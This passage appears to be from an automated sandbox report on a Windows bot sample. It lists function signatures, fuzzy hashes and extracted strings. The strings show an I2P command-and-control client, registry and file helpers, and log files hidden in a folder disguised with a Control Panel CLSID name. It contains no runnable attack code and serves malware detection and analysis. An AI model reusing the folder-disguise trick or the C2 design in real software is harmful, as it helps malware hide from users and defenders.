                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
                                    • API String ID: 3395718042-2735303109
                                    • Opcode ID: ebf9d58a63554e6c52e0b6df3d98ce9052d5d2b5b3cdbd27a79c7ef099bc9720
                                    • Instruction ID: 8020d66ddfc8914f6f35fa55a2e82b7c4d187e2203083cddf353c0de82685410
                                    • Opcode Fuzzy Hash: ebf9d58a63554e6c52e0b6df3d98ce9052d5d2b5b3cdbd27a79c7ef099bc9720
                                    • Instruction Fuzzy Hash: 3B51E6D0E0C69385FB279735EE806B82250AF0F784F545436D50EC62B6EEEDAD8A8341
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$evtsrv.l$log$~
                                    • API String ID: 3395718042-190452282
                                    • Opcode ID: c05900a8507ee543a62eed4c6a185f04896fe9d0da75e948d3abfafb94edaaae
                                    • Instruction ID: 635da9fb7584a1fb413bdfda998624353fe52ca96ff93cfd146a06660f85a228
                                    • Opcode Fuzzy Hash: c05900a8507ee543a62eed4c6a185f04896fe9d0da75e948d3abfafb94edaaae
                                    • Instruction Fuzzy Hash: 77514CD0A2C7C385FA229B31EC913BC1256AF67744F4C46B3C90D766BADE6DA945C301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
                                    • API String ID: 3395718042-315528054
                                    • Opcode ID: dcfddc2b426ac29bdb8cf0f95e9105a01ebd652cce81c2a24819274074492461
                                    • Instruction ID: fea981793bd8296bd15cd467253734b9306e1c9f98eb291e5371454ceaabc360
                                    • Opcode Fuzzy Hash: dcfddc2b426ac29bdb8cf0f95e9105a01ebd652cce81c2a24819274074492461
                                    • Instruction Fuzzy Hash: 94515B98A1C68391F6125F70ECDA3BD9250AF44384F9C40B7C5CD37AA6DE6DBA46C341

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1200 7ffb2270427c-7ffb227042a4 InitializeCriticalSectionAndSpinCount 1201 7ffb227042aa-7ffb227042de call 7ffb22702700 call 7ffb2270ce6b 1200->1201 1202 7ffb227043d0-7ffb227043f1 GetLastError call 7ffb227040d2 1200->1202 1215 7ffb227043a9-7ffb227043c1 call 7ffb227040d2 1201->1215 1216 7ffb227042e4-7ffb227042fb strlen 1201->1216 1207 7ffb227043f3 1202->1207 1208 7ffb22704412-7ffb22704418 1202->1208 1212 7ffb227043f9-7ffb22704406 1207->1212 1213 7ffb227044d1-7ffb227044d6 1207->1213 1210 7ffb2270441e-7ffb22704424 1208->1210 1211 7ffb227044db 1208->1211 1217 7ffb22704426-7ffb2270442c 1210->1217 1218 7ffb22704450-7ffb22704453 1210->1218 1224 7ffb227044e5-7ffb227044ea 1211->1224 1212->1208 1213->1215 1228 7ffb227043c6-7ffb227043cf 1215->1228 1219 7ffb22704313-7ffb22704316 1216->1219 1220 7ffb227042fd-7ffb22704300 1216->1220 1222 7ffb227044f9-7ffb227044fe 1217->1222 1223 7ffb22704432-7ffb22704438 1217->1223 1225 7ffb22704455-7ffb22704458 1218->1225 1226 7ffb2270446d-7ffb22704473 1218->1226 1231 7ffb22704338-7ffb22704381 strlen fopen 1219->1231 1232 7ffb22704318-7ffb22704332 strcat strlen 1219->1232 1220->1219 1227 7ffb22704302-7ffb2270430f strlen 1220->1227 1222->1215 1229 7ffb22704503-7ffb22704508 1223->1229 1230 7ffb2270443e-7ffb22704444 1223->1230 1224->1215 1233 7ffb2270445a-7ffb2270445d 1225->1233 1234 7ffb227044c7 1225->1234 1235 7ffb22704475-7ffb2270447a 1226->1235 1236 7ffb227044ef 1226->1236 1227->1219 1229->1215 1237 7ffb22704446-7ffb2270444b 1230->1237 1238 7ffb2270447f-7ffb22704484 1230->1238 1239 7ffb22704387-7ffb227043a3 call 7ffb227040d2 1231->1239 1240 7ffb2270449d-7ffb227044b8 call 7ffb227040d2 1231->1240 1232->1231 1233->1224 1241 7ffb22704463-7ffb22704468 1233->1241 1234->1213 1235->1215 1236->1222 1237->1215 1238->1215 1239->1215 1246 7ffb2270450d-7ffb22704527 call 7ffb227040d2 1239->1246 1240->1215 1241->1215 1246->1228
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
                                    • API String ID: 3395718042-1297835036
                                    • Opcode ID: d608998b748734eab2d20801051afb47f70174508fd460ff7f8dc53809c99610
                                    • Instruction ID: 67660d0189d9c20bf0f3969c99a88495b1c3d8ebf59792b589e35f80bd519fe4
                                    • Opcode Fuzzy Hash: d608998b748734eab2d20801051afb47f70174508fd460ff7f8dc53809c99610
                                    • Instruction Fuzzy Hash: FC514FE1A1C6D385FA2A9B30ECA03B85250AF47744F901036D90EE66B5DEECAE5DC701
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
                                    • API String ID: 3395718042-2859552336
                                    • Opcode ID: 8eb523f6f635b5c07c8c6666e5b4f78f4833ebcdab95b7191bacb9555ff02cba
                                    • Instruction ID: 1c7fe4009b484da21f512296b99a9d63b81dc11de1d18de66fc8ebf526382f75
                                    • Opcode Fuzzy Hash: 8eb523f6f635b5c07c8c6666e5b4f78f4833ebcdab95b7191bacb9555ff02cba
                                    • Instruction Fuzzy Hash: 08513ED0E1CB9B81FAA39B31EC843BC5255AF4B745F9C40B2C90E266A5DE6CA947C701
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-3890537267
                                    • Opcode ID: 544a69305bef499ce7d2453c7d2b6ff2912d1efc63b2779777ded2693e20a23b
                                    • Instruction ID: 866d0b03175d2daf718e1d33e8774a12558d654d5fb3d249be9d8cba3eef3778
                                    • Opcode Fuzzy Hash: 544a69305bef499ce7d2453c7d2b6ff2912d1efc63b2779777ded2693e20a23b
                                    • Instruction Fuzzy Hash: DBA14DE1A0C7CB81FA269720EC403B93261AF0B755E540132D91ED66B1EEEDAD89C303
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-3890537267
                                    • Opcode ID: 2d9d8e01c26293ebd5e956b6b79eb68f4cf47b494667fc9fb6c32eda91e6c0a0
                                    • Instruction ID: c384a2be7d8938c709cc7ceb61c80af1ece2912025c8933a4f28172b2441f35d
                                    • Opcode Fuzzy Hash: 2d9d8e01c26293ebd5e956b6b79eb68f4cf47b494667fc9fb6c32eda91e6c0a0
                                    • Instruction Fuzzy Hash: 5AA11FE1D0C7CB91F7229761EE403782254AF0AB58E544132D92ECA7B1EEEDED85C742
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-3890537267
                                    • Opcode ID: 84e1102881e14aa1f1fe1744a6ea1b08f4cca0e5c6733abdbc1240c36314e2db
                                    • Instruction ID: 1e8c7863dfd997bafbcd3fa3e2de626256f487dda981ff38d12b8c87bb75b468
                                    • Opcode Fuzzy Hash: 84e1102881e14aa1f1fe1744a6ea1b08f4cca0e5c6733abdbc1240c36314e2db
                                    • Instruction Fuzzy Hash: FFA167E0A0C7CB81F6639731EC403BC63627F67784E4C02B6D91E366A9EE6DA945C305
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-3890537267
                                    • Opcode ID: 7d3cf77ab48ebe66b309a578ee114a658df6942dc3b7a330a2a0c28baeca7cb0
                                    • Instruction ID: 0476678b8ab82e0f5542852bd137b3eb0a8fce82f017f2c49941c158dfc61d08
                                    • Opcode Fuzzy Hash: 7d3cf77ab48ebe66b309a578ee114a658df6942dc3b7a330a2a0c28baeca7cb0
                                    • Instruction Fuzzy Hash: 92A13E9990C7CB85FA22AF60EC8837C72506F44744F4C41BBC9CD666E1EE6EA985C342
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-3890537267
                                    • Opcode ID: 7310aad736842cb7b11f3b6cd13ab58d5f6879207f68ca259b3a597a8c6d5c50
                                    • Instruction ID: f474ba838bab2fd74700adb01f48714ab4f32fcef60f72f6d68f825270014f33
                                    • Opcode Fuzzy Hash: 7310aad736842cb7b11f3b6cd13ab58d5f6879207f68ca259b3a597a8c6d5c50
                                    • Instruction Fuzzy Hash: 14A1FEE0D0C7CB95F66A9B60EC413792254AF07748E540132D91ECB7B5EEEDAE8D8302
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-3890537267
                                    • Opcode ID: 3254d7c58e01438740999ba0d3a834f1f6246f3ea7ebcb3f0694f57f6c045d34
                                    • Instruction ID: 23a1c35ea14033a49e706cc58d67a7bbce255c2259de0e8cc271fb7c37566a10
                                    • Opcode Fuzzy Hash: 3254d7c58e01438740999ba0d3a834f1f6246f3ea7ebcb3f0694f57f6c045d34
                                    • Instruction Fuzzy Hash: FCA162E090DBCF81F6629724EC4477D2250AF06744F5C06B2DA5E277E6EE6DE986C302
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: CreateErrorLastThread
                                    • String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
                                    • API String ID: 1689873465-2891999747
                                    • Opcode ID: 9440ff41f7ffa46fdab4ccb718da3e43072494cb815ec319ec81a3114deaf31f
                                    • Instruction ID: 05e7a6d8e46911bb4bdc7557265e6f15effdae08c28618da0c8dde28ed417589
                                    • Opcode Fuzzy Hash: 9440ff41f7ffa46fdab4ccb718da3e43072494cb815ec319ec81a3114deaf31f
                                    • Instruction Fuzzy Hash: 0B91FFE8A0C7C355FA629F34ECCC3BD2690AB44365F5802B5C4DDAA2E5EF6CA549C341
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: _errno$fclosefopenfwrite
                                    • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                    • API String ID: 608220805-544371937
                                    • Opcode ID: af7c7cab041d3b851780146d5672c8fe18e1dd2933ac2adfc5023734d97ee3c1
                                    • Instruction ID: 3d532d06a7d365640285ce5d987b256a466569cb4bd57814e44e2818c28c4611
                                    • Opcode Fuzzy Hash: af7c7cab041d3b851780146d5672c8fe18e1dd2933ac2adfc5023734d97ee3c1
                                    • Instruction Fuzzy Hash: 65519E21A0B683D6FA20BB54E9402F8E255BF64794FDA01B2D90D476B4DF3CF9478320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                    • API String ID: 1104438493-1059260517
                                    • Opcode ID: 40dbb72f32e1da1f63c3337725ccdb864fd4bb97a0da6b954f206b1e6fe925d8
                                    • Instruction ID: dec5d0b6a4f3d11abe6852c4a66e088c5f7ad6ad88f3a3f08687b1ea11d9524a
